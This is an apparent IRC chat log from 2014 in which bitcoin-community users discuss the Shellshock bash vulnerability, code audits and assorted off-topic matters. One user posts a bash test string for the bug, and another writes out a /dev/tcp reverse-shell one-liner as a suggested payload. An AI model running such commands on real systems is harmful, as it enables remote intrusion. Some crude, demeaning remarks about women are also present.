214000+ entries in 1.538s

mircea_popescu: Transcript for 24-09-2014, 1337 lines <<< we've done it, everyone. i hereby call the end of the #b-
a party. thanks for all the lines, it's been
a hoot etc!
mircea_popescu: lobbes: and the paper wasn't even peer reviewed << in that guy's case, peers can be
a misnomer :p
mircea_popescu: maybe. still,
a lot can be done until one runs into such walls.
mircea_popescu: in
a security environment, security is auditable provided the comittment to security is not compromised in order to listen to some ziggler impersonator.
mike_c: gee, every single one of my ec2 servers is scheduled for
a reboot now.
mircea_popescu: doctors have been doing ok auditing the human body w/o any spec for
a while now.
mircea_popescu: TomServo: Would an audit even be useful without
a specification? << perhaps, yes.
mircea_popescu: ThickAsThieves: is there
a trustworthy wot-signed document of an auditor saying any version of bitcoin is safe? << the most there is is me going on the record that .6.* is probably okay.
mircea_popescu: mike_c it's
a very large hole. odds of no pencildick managing to find it, ever... hm
Naphex: mircea_popescu: its
a stupid check lol
mircea_popescu: export badvar='() { (
a)=>\';bash -c "hackerfile echo vulnerable";grep vulnerable hackerfile||echo safe << if anyone wants to test it
kuzetsa: the initial "fix" was for
a parsing flaw described in CVE-2014-6271 (shellshock) which
a lot of distros patched but then didn't get CVE-2014-7169 as well (
a different type of issue with bash)
mircea_popescu: ThickAsThieves: i often think about that, how the hell can someone who cannot/willnot read code, ever be the steward of
a software project safely? <<< you know i don't actually read all that much code at all. i guess i could, more or less, but i wouldn't trust myself to understand it. by which i don't mean "what it does", but i do mean "what we can absolutely say about this program"
kuzetsa: Naphex: yeah, I decided to compile
a new kernel anyway so I rebooted after making sure bash was patched :)
mircea_popescu: how is it done ? why, by not acting towards
a goal, but from
a cause.
mircea_popescu: we're not here for
a goal, we're here because
a cause. major fucking difference.
mike_c: if i wrote
a new btc wallet (or managed development thereof), it would be secure for fear of above methods
mircea_popescu: you, in fact, are currently and have been for
a year, molding
a bullet.
mircea_popescu: if he says this sitting right next to
a lathe i'm going to smack his head on the lathe.
mircea_popescu: unless
a meteor falls, they're coming home with 10 kids.
mircea_popescu: you don't need round stones to produce round stones. you just need
a rotative process.
mircea_popescu: the reason airbus is
a thing is because the romans forced men to push oars.
mircea_popescu: once the "you have one chance, don't fuck it up" model gets implemented universally, we'll have
a wholesale return to the pleasant mores of the society constructed on enforcing the same principle upone women only.
mircea_popescu: he lives in
a world where being
a scummy fuckwit is okay, because everyone is
a scummy fuckwit.
mircea_popescu: jurov: redhat would be in
a position to do it << redhat is
a usg subcontractor. this is like saying goldman sachs is in
a position to break the aml/kyc bullshit ring.
mircea_popescu: so if your per line price can be few enough satoshi, this is
a valid business model.
mircea_popescu: jurov: is anyone willing to pay "we have read the code for you" kind of security? <<< yes. but it's like the case with drinking water : people ARE wiling to pay for drinking water ; people are not willing to pay to have
a dam constructed.
kuzetsa: Naphex, asciilifeform: yeah... I've had to stop neglecting
a production server and finally run updates today because of shellshock :(
mircea_popescu: wywialm no, you're right, it's just... it's
a fundamental idea that saw much expression.
mircea_popescu: for that matter, it's
a direct pastiche of knight, You cannot fix
a machine by just power-cycling it with no understanding of what is going wrong.
mircea_popescu: which is why you can have good programmers that speak english, russian or whatever else natively, as well as c or lisp or whatever else ; but you can't make someone
a good programmer by teaching him to say i++;
mircea_popescu: this is exactly the case in here. to imagine one can somehow magically learn "the language" without
a) passing the requisite tests and b) interiorising the culture that spawned that language is naive. and if
a and b is satisfgied, the form of language is really moot anyway.
mircea_popescu: ing even may be an excessive requirement. if on the other hand in
a room with
a woman that doesn't want to, you can be e
a poe for all the good it'll do you.
mircea_popescu: bounce: now it would help if we can properly articulate what ails us. but we can't, because the terminology has been deliberately confused and watered down and broadened and stretched (by the industry) so as to spread FUD more effectively << you are very naive to imagine the terminology has anything to do with it. point in case : if in
a room with
a woman that wants to fuck me, i don't need to speak her language. point
mircea_popescu: since they can't find
a sponge that comfortably fits
a calender
mircea_popescu: the feminist is
a 650 lb mountain dew and icecream behemoth with
a very popular twitter profile, and
a lot of lj experience.
mircea_popescu: asciilifeform the guy is
a 65 lb environmentalist vegan artist with
a lot of etsy success, on lesswrong and patronize or w/e that donation site is.
mircea_popescu: bounce: VERY DANGEROUS UBERHACKERS << ever see
a woman with
a little girl trying to cook while the little girl stirred some random items in
a smaller pot immitating her ?
mircea_popescu: ThickAsThieves: they wanna jedi mind trick the fappening and NSA etc << there's probably
a feminst and an environmentalist somewhere in the us that actually will buy into it.
mircea_popescu: "Username/password combinations dont cut it anymore, and Two-Factor authentication is
a great way to help secure user accounts. If you have an account with
a system that supports it, you should be using it."
Naphex: could've just used
a reverse echo "code" >& /dev/tcp/8.8.8.8/8080 0>&1
Naphex: what
a stupid payload to even ping back
gribble: Error: "titlasers" is not
a valid command.
jurov: ;;titlasers should be
a thing
chetty: you need an airplane to discover
a house?
bounce: of course they /could/ have done all that with ordinary planes, except rules. there's no rules for this yet, so some enterprising clerk or other can just order renting such
a thing out of the petty cash.
kakobrekla: but combine the both and you get
a selling sensation
rithm: i've been thinking bitpay's bowl gam sponsorship was
a play to get bitcoin in ncaaa stadiums
rithm: The Love Will team presented students with information about Bitcoin transactions, mobile hot wallets, and rolled out their new Jacket Wallet,
a customized Pheeva hot wallet, specifically for Georgia Tech students and faculty, available on android and in the app store soon. The team plans to create this type of customized wallet at every university that begins to accept Bitcoin on campus.
mircea_popescu: either someone on the ground here pulled
a practical joke at the "media" expense, or else us folk running off to argentina is becoming
a problem for the minitruth
nubbins`: so apparently they found
a backdoor in the shellshock patch on github, hey?
mircea_popescu: they didn't understand there's
a mp. it hurt. won't repeat mistakes next time.
mats_cd03: my principle concern is getting to 1000btc. i don't know if it can be done, at the current rate of career progression... i need
a better job.
mircea_popescu: "pay us money, you get
a facemorph of all the people in your demo."
mircea_popescu: ThickAsThieves: it's not
a real man, it's face morph of all the men in their target audience <<< this. it's probably the real point of facebook.
mircea_popescu: and if you can't find people who work like that, you're not in
a good country to do business, quit the bezzlathron and move.
mircea_popescu: mats_cd03: but every contractor in the world is
a miserable, lying thief. << because you pay upfront.
mircea_popescu: kakobrekla: barely over retard. <<< nah you're just too young to have
a clear memory of the 90s :D
mats_cd03: also, if you are poor or need superior treatment in
a pinch, go to
a va or teaching hospital.
nubbins`: probably just
a celica w/
a body kit or something
nubbins`: tat that's
a pretty fancy car to be crashing into
a rock face
bounce: also, I'll peer review your paper in return for
a couple subs
nubbins`: i'm going to submit
a paper about how submarine sandwiches don't exist
ben_vulpes: ThickAsThieves: honestly it's
a play to get some time to read the code and fuck around with tests before clients start asking for features.
jurov: in half
a day i made it actually talk to altcoind (altcoiners, watch your .altcoin/debug.log ;) )
mike_c: i am
a fan of the security bug bounties (if they are sizable). gives hackers
a way to do their thing and get paid legally.